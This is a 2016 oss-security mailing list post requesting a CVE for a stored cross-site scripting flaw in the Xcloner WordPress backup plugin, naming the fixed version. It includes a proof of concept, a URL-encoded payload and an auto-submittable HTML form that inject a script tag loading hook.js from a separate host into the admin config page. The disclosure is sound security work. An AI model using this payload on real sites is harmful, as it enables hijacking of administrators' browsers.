[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] CVE request : a stored XSS in Xcloner for wordpress
From: limingxing <limingxing () 360 ! cn>
Date: 2016-07-27 2:35:46
Message-ID: 3626D6E697A150459C44C0E5D8D8D00E0DBE8BDF () EX02 ! corp ! qihoo ! net
[Download RAW message or body]
Hi
I found a stored XSS in Xcloner for wordpress. The XSS filter can
be bypass.
Here is the plugin page
https://wordpress.org/plugins/xcloner-backup-and-restore/
PoC
In the "Corn setting" page(URL is
"http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config"),
set the "Backup name" (corn_bname) like
"1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on"
<html>
<form
action="http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config"
method="post">
<input type="hidden" name="cron_bname"
value="1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on"
/>
<input type="submit" name="submit">
</form>
</html>
Fix way
Update to version 3.1.5
Change
https://plugins.trac.wordpress.org/changeset/1456784
Could you assign a CVE ID for it?
Chen Ruiqi
Codesafe Team=
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic